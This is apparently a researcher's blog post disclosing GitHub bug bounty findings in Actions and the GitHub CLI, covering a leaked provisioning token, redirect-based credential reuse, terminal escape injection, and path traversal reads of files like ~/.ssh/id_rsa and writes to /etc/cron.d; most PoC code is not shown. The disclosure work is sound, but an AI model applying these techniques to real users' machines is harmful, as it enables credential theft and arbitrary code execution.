Github bug bounty experiences — Actions and CLI

Imre Rad
9 min readSep 7, 2023

--

The Github bug bounty program has celebrated its 9th birthday recently and I decided to try myself in that space.

Finding #2034215 — Leaked token during image provisioning phase

I started looking into Github Actions first — wanted to learn more about how jobs are dispatched and how these ephemeral virtual machine instances are isolated. In short, pretty well :) While digging around, I found something interesting though. The disk behind the Actions VM is booted twice. The first phase is called image provisioning mode, and it is only the second boot that actually executes your Action workload. More interestingly, the virtual machines behind these two phases are different, in the first phase, the disk is attached to a VM running in a different security context. As any write operations (including file removal) to the file system disk are likely recoverable due to the nature of file systems, I started doing file carving, hoping to find something sensitive.

At the same time, by using a .NET decompiler, I looked into the source code of the /opt/runner/provisioner/provisioner executable. I found two interesting files, /data/accesstoken/.accesstoken and /opt/runner/provisioner/.settings, both of them are removed after slurped from disk. In other words, the image provisioning populates these files, then the 2nd phase picks them up and removes them. The content of the first one was a base64 encoded string, so I didn’t have much chance to find it in a 100+ GB disk, but I was able to recover the second based on some special strings that I knew were present (e.g. AadIssuanceEndpoint). The dirty magic I used was the following shell command:

LANG=C grep — only-matching — byte-offset — ignore-case — binary — text ‘“protectedSettings”’ /dev/root &

Then I could finally find the .settings file:

Later on, I was able to extract the same (and also the .accesstoken) via different means as well, e.g. by dumping the memory of the process itself. (The accesstoken FTR seems to be the result of an RSA-2048 operation.) However, this was still the same security context as the VM itself, without any impact.

I was about giving it up, when I found something interesting again. I noticed the contents of a system directory on about 25% of the hosted runners were different. The leak could be found in /var/lib/waagent/history:

Sometimes there were 4 zip (+ the dir):

Sometimes there were only 3 (+ the dir) — note the zip file with : characters in the filename is small (~1k):

And sometimes, like in the example above, the zip file with : characters in the filename contains ExtensionsConfig.2.xml (that contains protectedSettings for Azure Custom Script Extension):

In this example, this zip file belonged to an Action runner instance called GHEUS3UB22EUS2C32–0061 (you can find the name in the /data/instancename directory). The zip file there contained a file called ExtensionsConfig.2.xml, which in turn featured the protectedSettings this finding is about. It is encrypted, the corresponding private key was present in /var/lib/waagent (Azure provisioned it in the first stage).

With some openssl and Powershell sorcery, the clear settings could be recovered:

This allowed me to invoke the machineregister API (adjust mmsghub, pool and instancename in the command based on the json output of the previous command):

As you can see, the token I gained access to belongs to a machine (fv-az313-256) that is different than where the attack was started from (GHEUS3UB22EUS2C32-0061); fv-az313-256 was in use during the image provisioning phase. This is a proof of accessing a different security boundary. While this sounds exciting, (un)fortunately it didn’t let me access anything sensitive or do persistent changes on anything (even though the API supported a method with PATCH verb). At this point I was hesitating for a few days whether to report this or not, then — as this is a proof of accessing a different security boundary - I decided to file a ticket. It was accepted, fixed and rewarded as a low severity issue. According to their explanation, the token was indeed not able to do much more than what I found.

Github CLI

In the rest of my research, I was focusing the official Github CLI, this was a source code review exercise. The PoC scripts can be found here. Github CLI 2.33.0 is the first version, that features fixes to all the issues described below.

Finding #2040559 — Github CLI 307

The net/http client of Golang supports following redirects, this functionality is enabled by default. The client also respects the specification and it resends the HTTP request body when encountering a 307 redirect. Corresponding source code:

https://github.com/golang/go/blob/master/src/net/http/client.go#L511

In the case of the Github CLI, the Authorization header was injected into the HTTP requests by a custom HTTP transport layer. The corresponding source code could be found here:

https://github.com/cli/cli/blob/5e2e818204e346b0c8e5afa1be5ad06159d42d15/api/http_client.go#L90

The combination of these two opens an interesting attack vector where a malicious server interacting with the official Github CLI could return 307 redirects pointing to either api.github.com or another Github Enterprise deployment in order to execute sensitive actions as the victim’s account on Github.com or the 3rd party GHE server.

The attacker has full control over the URL where to send the request to. The attacker has partial control over the request body.

The repro steps are:

  • As the attacker, open a Pull request in the victim’s (irsl/pr-test) repository on Github.com and retrieve its ID:
  • As the attacker, start the PoC redirect server:
  • As the victim, send PR approve request to an attacker emulated/controlled Github Enterprise server (gcpexp.duckdns.org here):

The attack is complete, the PR in the victim’s repository on Github.com (irsl/pr-test) got merged by the victim unintentionally. Note, neither the name of the repository, nor the numeric ID of the pull request matters in the victim command. The attack could be better weaponized by merging the steps together (so the attacker would open the malicious pull request on the fly).

This submission was rejected due to low impact, but rewarded still. Later on, I noticed it got also fixed. Interesting combo, huh?

The Github security team, while reviewing the draft of this write up, commented: “…when we close reports as `Resolved` with a note that they do not represent a significant security risk it does not necessarily mean that we do not intend to address the issue outlined in the report. Although not every issue reported to us is of significant enough risk that it aligns with our documented severity scale, we still want to encourage and reward submissions that may fall outside of this scale as those often contribute to our overall defense-in-depth posture.

Finding #2073472 — Github CLI GH_OAUTH_CLIENT_ID

The primary component of the build tooling of the Github CLI is the build.go file that supports a few environment variables as incoming parameters, including GH_OAUTH_CLIENT_ID/GH_OAUTH_CLIENT_SECRET.

The code populates a string slice invoking go build in order to kick off the build process: https://github.com/cli/cli/blob/2a4160a3a38d3c05a1395b32cd422d5fe1a8e92d/script/build.go#L53

This means:

  • no shell interpreter is involved
  • the attacker does not control the command to be executed
  • the attacker cannot add a new parameter (a full item of the argv slice )

Still, the Golang ldflags parameter allow multiple ways to execute arbitrary helper binaries. On *nix this is limited to files that are present on the local system, but on Windows, the attacker could execute arbitrary binaries with the help of UNC paths.

To repro:

Where the content of the batch file could be something like this:

Then kick off the build:

Verify that the proof file indeed shows up.

If these environment variables are ever exposed as parameters for a build job, then users who have permission to trigger it could bypass the code review process and execute arbitrary code as part of the build — potentially allowing to mount a supply chain attack.

This submission was rejected (“an attacker gaining this permission is outside of our considered threat model”).

Finding #2047239 — Github CLI terminal escape sequences

The Github CLI writes output to the terminal from attacker controlled input. In most cases, binary characters cannot be present:

gh repo edit -d irsl/test -d “$(printf ‘hello \x1B#8 world’)” is rejected with “description control characters are not allowed” or gist filenames/descriptions/content are sanitized so \x1B is is turned into two printable ascii bytes \x5E\x5B (^[).

However, gh repo view blindly relays the readme file to the output/terminal. As such, it is vulnerable to terminal escape sequence injection attacks, which may lead to arbitrary command execution on the client/victim side, if gh interacts with an attacker controlled repository (hosted either on Github.com or on an Enterprise deployment).

If you are unfamiliar with terminal escape sequence attacks, please refer to these great articles:

Some terminals also support setting data to the system clipboard, some of them has this feature enabled by default. A great summary of this: https://github.com/tmux/tmux/wiki/Clipboard

The most recent versions of the most popular terminal emulators are patched against attacks that are known to execute commands, but they have a long history of such issues from the past. Also, based on “… depending on terminal, other features such as font size, colors, terminal size, character set, alternate screen buffers and more may be accessible though escapes. “, and “xterm, linux console, gnome-terminal, konsole, fbterm, Terminal (Mac OS)… the list of terminal emulators is not so short! And each of them has its own bugs and limitations compared to DEC and ANSI standards.”, I think it is reasonable to assume that there are terminal emulators out there which could be exploited even today or new attacks could be identified in the future.

To demonstrate this, I created a repo with a readme that contains the following escape sequence:

ESC # 8 (V) Fill Screen with E’s

This is a live video:

ESC # 8 (V) Fill Screen with E’s

This attack should be compatible with any terminals :)

To demonstrate something more severe as well, let’s take a look at the popular screen terminal. Screen has a feature (even though it is not documented), that allows writing and reading the title of the current window, so the classical attack can be mounted to feed the input of the terminal with an arbitrary string. There is a limitation I couldn’t bypass though, newlines are filtered out, so the user needs to press the enter button. Since I hide the injected text, I think hitting the enter button would be a user reaction with high likelihood.

In order to hide the command to be executed, we push a lot of whitespaces to the terminal. And visuals:

https://youtu.be/tmOif-bwW2A

In short, interacting with an attacker controlled repo could result in arbitrary command execution. This submission was rewarded and fixed here. Fun fact: I reported effectively the same issue to Google in the context of the gcloud CLI, the submission was accepted, but neither rewarded nor fixed.

Finding #2073425 — Github CLI path traversal file read via issue templates

The Github CLI features per repo issue templates. They are effectively text files with a special filename under the repository. Both “Legacy” and “NonLegacy” templates are supported. The legacy ones are indexed here:

And read here:

Note that no security measures were present to prevent loading content via a symlink. This allows an attacker to steal sensitive files of a victim when they open an issue in a malicious repository.

To repro, execute the following commands as the attacker:

Then, as the victim:

Both templates will be offered, instead of the deprecated one, choose the “blank” one:

“Open a blank issue” suggests an empty issue would be opened. Press enter to skip and submit.

At this point, the file pointed by ISSUE_TEMPLATE has already been uploaded.

Examples of other potential targets (assuming gh repo clone was executed in $HOME):

  • ../../.ssh/id_rsa
  • ../../.config/gh/hosts.yml

This flaw was accepted, rewarded and fixed.

Finding #2037915 — Github CLI path traversal file write via release download

The official Github CLI supports managing releases of Github repositories. It supports Github Enterprise deployments as well, it is not limited to the official www.github.com site. The implementation of the asset download command can be found here: https://github.com/cli/cli/blob/trunk/pkg/cmd/release/download/download.go#L286

Note, it supports saving the destination file based on the Content-Disposition header returned by the server. This was trusted blindly so it was vulnerable to path traversal when the CLI connected to a malicious server. An attacker could download arbitrary data and save it to arbitrary locations on the victims machine, breaking out from the specified destination directory. Placing a new file to /etc/cron.d is executed eventually (there are many other alternatives), so the impact of this path traversal primitive is effectively code execution.

To repro, run the attached Python PoC on a server with proper TLS certificates. Example:

Then simulate the victim session (note the file is written to /tmp/any-filename breaking out of the specified destination dir /tmp/d):

There was a limitation, if the destination file already exists, the CLI complains to use --clobber.

This vulnerability report was accepted, rewarded and fixed.

Take aways

My experience with this bug bounty program is positive so far (reasonably fast response time, fair reward decisions, nice swags). Stay tuned, my next write-up will be about a batch of server side flaws in Github Enterprise Server :)

--

--

Imre Rad
Imre Rad

Written by Imre Rad

Software developer daytime, security researcher in freetime